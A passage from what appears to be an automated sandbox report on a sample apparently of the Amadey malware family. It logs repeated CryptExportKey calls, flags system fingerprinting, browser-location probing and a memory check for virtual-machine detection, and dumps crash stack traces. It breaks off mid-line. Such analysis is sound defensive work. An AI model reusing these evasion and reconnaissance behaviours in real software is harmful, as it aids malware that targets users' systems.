CryptExportKey Nov. 3, 2023, 6:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00627a48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00627ac8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00627ac8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00627cc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00628588 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00628588 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:09 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00628448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00618b70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00618b70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00618bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00619170 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006191b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006191b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006192f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006192f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00619230 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00619070 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00619070 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00619070 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076bd08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076bd08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076bec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00509720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00509720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00509720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00509720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005097a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005097a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005096a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005096a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005096a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005096a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005096a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00509720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00509720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 6:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00509920 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

D:\Mktmp\Amadey\Release\Amadey.pdb

Tries to locate where the browsers are installed (4 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe\Path

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 3, 2023, 6:09 p.m.		1	1	0

One or more processes crashed (41 events)

Time & API	Arguments	Status
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x22cbf0d 0x22cbcde 0x22c6cad 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x22cc048 registers.esp: 33484932 registers.edi: 33484984 registers.eax: 0 registers.ebp: 33484996 registers.edx: 6314384 registers.ebx: 33486212 registers.esi: 38346860 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd2906 0x7fd27c9 0x7fd26e5 0x7fd17e0 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd31f4 registers.esp: 33483284 registers.edi: 33483532 registers.eax: 0 registers.ebp: 33483544 registers.edx: 133903064 registers.ebx: 33486212 registers.esi: 40381900 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd6b28 0x7fd2d18 0x7fd27c9 0x7fd26e5 0x7fd17e0 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd6b6b registers.esp: 33483520 registers.edi: 33483804 registers.eax: 0 registers.ebp: 33483528 registers.edx: 0 registers.ebx: 33486212 registers.esi: 40381900 registers.ecx: 37952456	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd2906 0x7fd27c9 0x7fd26fd 0x7fd17e0 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd31f4 registers.esp: 33483284 registers.edi: 33483532 registers.eax: 0 registers.ebp: 33483544 registers.edx: 133903064 registers.ebx: 33486212 registers.esi: 37938788 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd6b28 0x7fd2d18 0x7fd27c9 0x7fd26fd 0x7fd17e0 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd6b6b registers.esp: 33483520 registers.edi: 33483804 registers.eax: 0 registers.ebp: 33483528 registers.edx: 0 registers.ebx: 33486212 registers.esi: 37938788 registers.ecx: 39229136	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd2906 0x7fd27c9 0x7fd26fd 0x7fd17e0 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd31f4 registers.esp: 33483284 registers.edi: 33483532 registers.eax: 0 registers.ebp: 33483544 registers.edx: 133903064 registers.ebx: 33486212 registers.esi: 37938788 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd6b28 0x7fd2d18 0x7fd27c9 0x7fd26fd 0x7fd17e0 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd6b6b registers.esp: 33483520 registers.edi: 33483804 registers.eax: 0 registers.ebp: 33483528 registers.edx: 0 registers.ebx: 33486212 registers.esi: 37938788 registers.ecx: 40659956	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd752d 0x7fd7400 0x7fd26e5 0x7fd1f58 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd31f4 registers.esp: 33483244 registers.edi: 33483492 registers.eax: 0 registers.ebp: 33483504 registers.edx: 133903064 registers.ebx: 33486212 registers.esi: 37938788 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd6b28 0x7fd79ae 0x7fd7400 0x7fd26e5 0x7fd1f58 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd6b6b registers.esp: 33483480 registers.edi: 33483820 registers.eax: 0 registers.ebp: 33483488 registers.edx: 0 registers.ebx: 33486212 registers.esi: 37938788 registers.ecx: 42224612	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd752d 0x7fd7400 0x7fd26fd 0x7fd1f58 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 48 34 fb 07 89 85 3c ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fd31f4 registers.esp: 33483244 registers.edi: 33483492 registers.eax: 0 registers.ebp: 33483504 registers.edx: 133903064 registers.ebx: 33486212 registers.esi: 37938788 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 6:09 p.m.	stacktrace: 0x7fd6b28 0x7fd79ae 0x7fd7400 0x7fd26fd 0x7fd1f58 0x7fd0ad5 0x22cc7af 0x22c6d75 0x22c6886 0x22c34ab 0x22c2f10 0x22c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 